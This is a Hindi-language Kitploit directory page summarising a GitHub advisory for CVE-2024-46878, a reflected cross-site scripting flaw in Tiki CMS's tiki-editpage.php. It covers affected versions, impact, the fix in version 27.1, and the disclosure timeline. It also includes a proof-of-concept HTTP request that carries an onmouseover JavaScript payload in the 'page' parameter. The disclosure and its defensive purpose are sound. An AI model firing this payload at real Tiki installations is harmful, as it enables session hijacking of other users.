Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-46878-TikiCMS-XSS — CVE-2024-46878 - Tiki CMS परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता | Kitploit
उपकरण/GitHubGitHub/coldfusionx/cve-2024-46878-tikicms-xss
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcoldfusionx/cve-2024-46878-tikicms-xss

CVE-2024-46878-TikiCMS-XSS

CVE-2024-46878 - Tiki CMS परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-46878 - Tiki CMS प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

Tiki CMS - 'page' पैरामीटर प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

अस्वीकरण

केवल शैक्षिक, अनुसंधान और रक्षात्मक उद्देश्यों के लिए अभिप्रेत है। अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध है।

सारांश

Tiki संस्करण 26.3 और उससे पहले के संस्करणों में tiki-editpage.php के page पैरामीटर में एक प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है। यह भेद्यता हमलावरों को एक क्राफ्टेड पेलोड के माध्यम से मनमाना JavaScript कोड निष्पादित करने की अनुमति देती है, जिससे संवेदनशील जानकारी तक संभावित पहुंच या अनधिकृत क्रियाएं हो सकती हैं।

प्रभावित उत्पाद

  • उत्पाद: Tiki CMS Groupware
  • संस्करण: 26.3 और उससे पहले
  • घटक: tiki-editpage.php

भेद्यता विवरण

यह भेद्यता tiki-editpage.php में page पैरामीटर के अनुचित इनपुट सैनिटाइज़ेशन के कारण होती है। उपयोगकर्ता द्वारा आपूर्ति किया गया इनपुट पर्याप्त एन्कोडिंग के बिना HTTP प्रतिक्रिया में प्रतिबिंबित होता है, जिससे इंजेक्ट किए गए JavaScript का निष्पादन संभव हो जाता है।

प्रभाव

एक प्रमाणित हमलावर को एक क्राफ्टेड अनुरोध के माध्यम से किसी अन्य उपयोगकर्ता के ब्राउज़र में मनमाना JavaScript निष्पादित करने की अनुमति देता है, जिससे संभावित रूप से सत्र अपहरण (session hijacking) या अनधिकृत क्रियाएं हो सकती हैं।

प्रमाण की अवधारणा (PoC)

अनुरोध

root@kitploit:~
GET /tiki-editpage.php?page=%22%20onmouseover%3Dalert(document.domain)%20 HTTP/1.1
Host: 127.0.0.1:9089
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: local_tz=Asia%2FKolkata; PHPSESSIDCV=51zQV%2BMxUnJxFY9nnRP%2FFg%3D%3D; javascript_enabled=y; PHPSESSID_CSRF=t2A6i9BjH1QHEH8KaLag0jtgT4dK9TTzyn8sOcRVwg9SMycfxWjoeYFmTykOfVjNPotrBKqsizXJ%2BrYcEXci8QPZxiSyBwA5YFLRS1S2RgxeTAI%3D; PHPSESSID=e19c8b25df427a7892245dc919be2067
Upgrade-Insecure-Requests: 1
Priority: u=0, i

poc

सुधार

यह समस्या Tiki CMS Groupware संस्करण 27.1 में हल कर दी गई है। उपयोगकर्ताओं को सलाह दी जाती है कि वे इस या बाद के पैच किए गए रिलीज़ में अपग्रेड करें।

विक्रेता संदर्भ: https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended

समयरेखा

  • विक्रेता को रिपोर्ट किया गया: September 5, 2024
  • विक्रेता की स्वीकृति: September 16, 2024
  • संस्करण 27.1 में सुधार: December 22, 2024
  • सार्वजनिक खुलासा (इस रिपॉजिटरी के माध्यम से): March 23, 2026

श्रेय

  • Sheela Sarva, Qualys
  • Mayank Deshmukh, Qualys

संदर्भ

  • https://www.cve.org/CVERecord?id=CVE-2024-46878
  • https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended
टूल डाउनलोड करें